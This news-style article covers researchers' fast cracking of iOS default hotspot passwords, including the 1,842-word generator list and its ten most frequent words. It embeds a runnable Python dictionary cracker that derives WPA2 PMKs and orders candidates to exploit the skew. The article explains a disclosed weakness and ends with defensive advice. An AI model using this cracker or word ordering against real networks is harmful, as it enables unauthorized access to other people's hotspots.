These German Guys Can Crack Your iOS Hotspot Password in a Minute


You may want to think twice about using your iPhone as a wireless hotspot. A group of researchers from the Department Informatik at Friedrich-Alexander-Universität Erlangen-Nürnberg in Germany developed software allowing them to crack Apple's default personal hotspot passwords in less than a minute.


As it turns out, Apple's iOS generates weak default passwords for the hotspot: a single English word of four to six letters, chosen so that it is easy for users to remember, followed by a four-digit number that does little to increase complexity. The problem with this sort of password generation, of course, is that attackers can easily crack such passwords (and they will), as proven by researchers Andreas Kurtz, Felix Freiling, and Daniel Metz when they managed to break into iOS (version 6 and below) tethered wireless sessions with dictionary-based brute-force attacks in less than a minute.

A brute force attack, in this context, is a dictionary attack: the attacker (or researcher) uses a tool that tries every candidate in a word list, combined with every possible suffix, against the password check until one of them is accepted.

Dictionary-based brute force attacks are pretty effective in general, although they consume time and computing resources. Not only do they test your password against every word in the English lexicon; the more thorough attacks also try spelling variations where numbers are substituted for letters, combinations of several words, and every previously used password they can round up from the databases of breached passwords that have surfaced over the last few years. (There has been a rash of data breaches in recent years in which attackers compromised lists of stored passwords on vulnerable servers and posted them on publicly accessible forums.)

A good password is more or less immune to brute force attacks. The primary weakness of Apple's hotspot password generation is that it not only relies on words (so that the passwords will be easy to remember), but relies on the very limited set of words with between four and six letters, followed by one of only 10,000 possible four-digit numbers. For all intents and purposes, given the processing power available to the researchers, this four-digit numerical suffix has no meaningful impact on password complexity: it multiplies the number of candidates by just 10,000.


The researchers grabbed an open-source Scrabble dictionary of just 52,500 four-, five-, and six-letter words from the Internet and used it to perform their brute-force attack. Far more four-, five-, and six-letter words exist than that, yet the researchers still succeeded 100 percent of the time; the drawback was that cracking a password took as long as 49 minutes.

The researchers weren't satisfied with 49 minutes. It was too long. So after a bit of reverse engineering (I'll spare you the specifics) the researchers found the English-language dictionary file within iOS that is actually used to generate these passwords. Interestingly, this is the very same dictionary that iOS uses to guess the words you are typing before you finish typing them: when you are halfway through a word and the full word (or sometimes the wrong word) pops up in a bubble above the text, this dictionary is what makes that feature possible. That discovery let the researchers narrow their 52,500 candidate words down to a much more manageable 1,842 words that the password generator actually draws from.

That's right. Apple's iOS hotspot password is one of 1,842 words plus a four-digit numerical suffix, which is only 18,420,000 possible passwords in total. This cut the time it took the researchers to break these hotspot passwords by 96 percent.

There's more, though: the researchers also determined that iOS's algorithm for choosing one of these words is skewed, so some words are chosen more often than others. The ten most frequently chosen words are: suave, subbed, headed, head, header, coal, ohms, coach, reach, and macaws. These top ten words are ten times more likely to be chosen as the default password than the other words, so trying them first speeds up the attack considerably. All this knowledge, along with some substantial computing power, gave the researchers the capacity to reliably crack iOS hotspots in 50 seconds. If you're curious, the cluster of computers they dedicated to this task managed 390,000 guesses per second.
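To make the attack described above concrete, here is an added example (my own code, not the researchers' tool or anything shipped by Apple) that builds the word-plus-four-digit candidate space, orders it so the ten over-represented words are tried first, and checks candidates the way a WPA2-Personal cracker does, by deriving the PMK with PBKDF2-HMAC-SHA1 (4096 iterations, SSID as salt) and comparing it with a target. The target PMK, the SSID "iPhone", the password "suave0042" and the short filler word list are all constructed for the demo; the real generator draws from 1,842 words, which this block does not include. It also computes how long exhausting the candidate space takes at the 390,000 guesses per second quoted in the article.

```python
import hashlib

# The ten words the article reports as over-represented in iOS default passwords.
TOP_TEN = ["suave", "subbed", "headed", "head", "header",
           "coal", "ohms", "coach", "reach", "macaws"]

# Constructed filler standing in for the rest of the 1,842-word list (assumption, not the real list).
OTHER_WORDS = ["aback", "abbey", "abbot", "abide", "abode",
               "about", "above", "acorn", "acres", "acted"]
WORDLIST = TOP_TEN + OTHER_WORDS

SUFFIXES = 10_000          # four-digit numeric suffix, 0000 through 9999
GUESSES_PER_SECOND = 390_000   # rate quoted in the article for the researchers' cluster


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal pairwise master key: PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt, 32 bytes."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ordered_words(words, top_first=()):
    """Put the most likely words first, then the remaining words in their given order."""
    top = list(top_first)
    seen = set(top)
    return top + [w for w in words if w not in seen]


def candidates(words, top_first=()):
    """Yield every word+NNNN candidate in the order an attacker should try them."""
    for word in ordered_words(words, top_first):
        for n in range(SUFFIXES):
            yield f"{word}{n:04d}"


def guess_index(password: str, words, top_first=()) -> int:
    """1-based position of a password in the candidate order (no hashing needed)."""
    word, suffix = password[:-4], password[-4:]
    return ordered_words(words, top_first).index(word) * SUFFIXES + int(suffix) + 1


def crack(target_pmk: bytes, ssid: str, words, top_first=(), limit=None):
    """Try candidates in order until the derived PMK matches; return (password, guesses tried)."""
    tried = 0
    for cand in candidates(words, top_first):
        tried += 1
        if limit is not None and tried > limit:
            return None, tried - 1
        if wpa2_pmk(cand, ssid) == target_pmk:
            return cand, tried
    return None, tried


def keyspace(n_words: int) -> int:
    """Number of word+suffix candidates for a list of n_words words."""
    return n_words * SUFFIXES


def seconds_to_exhaust(n_words: int, rate: int = GUESSES_PER_SECOND) -> float:
    """Worst-case time to try the whole candidate space at the given guess rate."""
    return keyspace(n_words) / rate


if __name__ == "__main__":
    # Constructed target: a hotspot named "iPhone" whose default password is "suave0042".
    target = wpa2_pmk("suave0042", "iPhone")
    found, n = crack(target, "iPhone", WORDLIST, TOP_TEN)
    print(f"recovered {found} after {n} guesses")
    print("same password in alphabetical order would be guess number",
          guess_index("suave0042", sorted(WORDLIST)))
    for n_words in (52_500, 1_842):
        print(f"{n_words:>6} words: {keyspace(n_words):>12,} candidates, "
              f"{seconds_to_exhaust(n_words) / 60:6.1f} minutes to exhaust")
```

A real attack checks each derived PMK against a captured WPA2 handshake rather than a known PMK, but the candidate ordering and the cost per guess are the same, which is why the 1,842-word space (18.42 million candidates) falls in roughly 47 seconds at 390,000 guesses per second while the 52,500-word Scrabble list takes far longer. The frequency skew is exploited purely by ordering: a "suave" password is found within the first 10,000 guesses when the top ten are tried first, versus well over 100,000 guesses in alphabetical order even on this tiny list.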

I usually close these articles with a bit of advice on how to protect yourself. This time it is simple: manually set a strong password for your iPhone-based Wi-Fi hotspot instead of accepting the generated default. In fact, this appears to be a fairly versatile threat, so I'd avoid using a default password on any other phone or tablet too, because the researchers think that this attack method probably works on a number of other mobile platforms as well.
